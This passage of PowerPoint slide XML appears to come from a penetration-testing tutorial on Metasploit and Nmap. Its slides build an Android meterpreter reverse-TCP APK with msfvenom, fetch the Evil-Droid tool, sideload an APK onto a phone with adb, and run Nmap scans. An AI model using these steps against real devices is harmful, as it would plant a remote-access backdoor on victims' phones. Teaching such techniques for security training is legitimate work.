          <a:xfrm>
            <a:off x="3886" y="103479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DAEE3F0A-3A19-F346-6C85-0C992CFE5C19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A16EA7DE-D22A-0622-00E7-390F43365380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8B40D559-A5D3-E068-6F18-3D0BBFC9227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17F9D3EF-BF70-9690-8500-1A4DECA0DE81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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6E87D1F9-EABF-744D-21F2-DA34BAB1BE61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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3C06E45B-BF8D-1922-4AAD-9F2FE3508236}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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133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5EAFDF0F-E156-5046-C86B-7DF408BFD91F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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7A3FF159-083D-0F76-2F33-85B536F4ED5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="475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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  --platform android  -p android/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> LHOST=192.168.100.104 LPORT=443 -o /root/Desktop/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mobile.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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30E09B-4001-DC0B-01A4-172EBDCD7596}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5127955" y="2706624"/>
            <a:ext cx="11204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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F7F2467-E1BF-4293-F580-67201FEBF069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140799" y="2494302"/>
            <a:ext cx="318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payload for windows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84137930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6E6300-F458-6432-A42C-5DDB8923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AE5969-A7E0-8F4D-792D-EFBB8245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69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2B71979-B3D5-09C8-3DE2-25B6D23BB686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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E7664B19-218B-969B-5C72-B56C1C04B8D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27955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D42E2EA-BFA1-EB40-2F15-F4FD53AFA49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27955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134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95BAE85-B8B4-1FAC-9678-6D1809707D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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DFEE9557-9AB3-1F29-642C-1C13808781A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7FC37B73-7B11-3548-6A84-111802364217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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B853EFA3-3744-05B1-2566-A5DBA0162127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82A23942-649C-CA66-70AC-590AAAE07DD7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BC0C30EB-90CE-0C02-6D28-AFD6C929567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1B864B7B-8550-8228-EE8C-98930DC1E1BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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AEC92C02-D5A7-DE92-9B5B-AB001A94570D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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0D013FC2-EB4E-A3C7-0780-7B3FC609A72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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134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0154ABA3-A8CF-7E22-747D-DDA8FCE07C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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30469934-61D7-9348-C96E-38C52DE09918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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-apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zipalign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3A87307-2220-75A9-6D17-B94DC2B19F3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zipalign</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool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DD9E7C1C-8FE2-A914-C805-59684E319C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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-apt install default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        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F14F48-5199-4975-FB1A-321CF2D14F5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2380526" y="2107098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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D0739F-5E0F-9D77-E482-EDCFF3703577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jdk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tool </a:t>
            </a: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B877671E-07EB-A678-9FD1-1263C4267D39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16841" y="2724150"/>
            <a:ext cx="493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-git clone</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/M4sc3r4n0/Evil-Droid.git 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52C9E5-9247-2731-F93A-5C2CADB620EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740684" y="3047315"/>
            <a:ext cx="12029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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF1EBA53-FDFB-2DAB-EA40-69377DE46C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6122608" y="2877776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Dowload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Evil-droid tool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107299-F8B9-F598-979A-8755DBE3CA5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3058098" y="2558337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8880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45DAE6-FC5F-FE2B-82D6-DFB46D7A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09833F-9A20-0A6C-38C8-AC650E574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69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D03A215-1EDD-73BB-65CA-54D53A58F567}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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E385014D-DC5A-51CC-FCC1-3DBB6F82518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27955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47463AD2-79D6-0CB7-2244-AD6DAE5D0D4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27955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135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2F7F8E7-480B-3396-5D51-3E2F345B0A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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1CCB065F-405C-8084-0ABE-1E2A4E4805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CE4A7A5E-0642-A8F5-279D-365DA5B17162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3886" y="103479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54797506-37E4-1ECF-AF96-324B6685DA87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399D2B0F-AD3D-516D-9303-9201BC8E5A0C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3D7CC46D-0D91-4F27-A419-3E3BC031799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5A3FBD23-A856-3D7C-04F5-05F4DBED113A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Metasploit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D1AC7A89-6A77-6C88-1430-DA0BC0F7B17D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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27CCADFD-592B-9A99-E4E5-6F5866BA1BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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135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EE217ECB-0A87-0F74-8BCF-0BA15C445235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>3.3  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Create payload 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B6348E84-D350-2700-62FE-49D9D885C3FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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-apt install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 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54FA06-0A7B-FD1B-E6A1-43454F7A19FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95D16803-66B8-DBE6-0CDC-E8533E4F15CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Tool 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DB039761-1270-F6DB-155D-378C199EC333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627201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adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> android    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B645F9-17CB-3816-3F78-57013724BF82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01521FBB-84FF-4626-6A44-06520620442D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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 with android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0D85E1-D9EC-7408-3189-3E57DF0B17D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB3CECA3-4997-FA55-AF16-4444BA4D2AFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to android </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7A62878-1AAA-0EC9-B0ED-A014ED7816EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>adb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7A70496-0F5B-4559-FC61-0DBB2C8A9B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65217" y="3069228"/>
            <a:ext cx="493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_SILENT_JAVA_OPTIONS="$_JAVA_OPTIONS" ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>unset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> _JAVA_OPTIONS ; alias='java "$_SILENT_JAVA_OPTIONS"'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18E664-594F-28F9-65B0-8C25B09F08B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5044571" y="3487257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Text Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E82E47D1-7750-A0F0-8F30-11E6511569B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6280345" y="3285856"/>
            <a:ext cx="385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to file </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>evil-droid in line 13 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="156802972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0B4903-E24D-5D4B-0487-3A9D9BB8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0E36572-0103-0C62-D066-9F9678B6B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69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F9E2D1C-497C-A3A0-77AE-8597C8C59BAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8342070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43AD4FD-9F2D-DAC6-EBC1-1F0E0E3E8D1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27955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A02E788-2A24-619F-8936-AFAF9188C5A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27955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136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6DAF34-F90F-77F6-7764-2ACA0E426708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5165419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9760C223-2919-A5DB-4434-AF4F8EBCF0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EBA5C528-38A3-59C2-4778-446C62F33EB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2997" y="108338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E21AD1CE-BF2A-0A78-137C-7850DEC60C9B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7CF85304-2E87-BEC6-B8CE-CD7EB45B0ABD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9B0EE769-0074-3293-74DB-DB7AA740CA4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8C6A383B-04DC-E9B8-7CC5-4DF76F58F2CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428878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Nmap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47FAD812-80FE-B87E-742A-24D9D86450B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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F71D49E8-1B20-F2F6-B8E2-526875D2DAB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5254955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136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0507E5AB-5A2F-7EA1-8969-19FA00488031}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246202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 altLang="en-US" spc="-10" dirty="0"/>
              <a:t>4.1  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" spc="-10" dirty="0"/>
              <a:t>command Nmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> 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EA313C29-65B6-A8CE-5AC5-1842C4CD87DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403654" y="1906674"/>
            <a:ext cx="332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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; 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7687DC-43DC-A6F0-9A4F-D298F786F002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133999" y="208090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49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{271EB395-296C-2B6F-43D5-04B5E5CC092E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3753084" y="1906674"/>
            <a:ext cx="318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scan port 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E4DA98B7-CB78-D8D2-4A63-19DA6FE34335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="396893" y="2329984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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;    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CF0AE65-19F9-1BC3-A184-BE3B050D63EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3460131" y="250609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 Box 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F3D850-E593-C165-6AE2-11F73CD69D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4973003" y="2329984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Skip ICMP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23F454-BC46-8B99-0328-A58CE87FCD09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416668" y="2927552"/>
            <a:ext cx="15700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Text Box 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25BF6220-0D66-3273-08CD-6E6B6C607F19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4154856" y="2740228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port 1-1000</a:t>
            </a:r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BB344BD4-E486-38A2-D4F1-2C09BDA4BDC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-526609" y="2657388"/>
            <a:ext cx="49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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –p1-1000 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79D8275-5C73-0C94-6C00-09F720CC5A1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17346" y="30257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–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
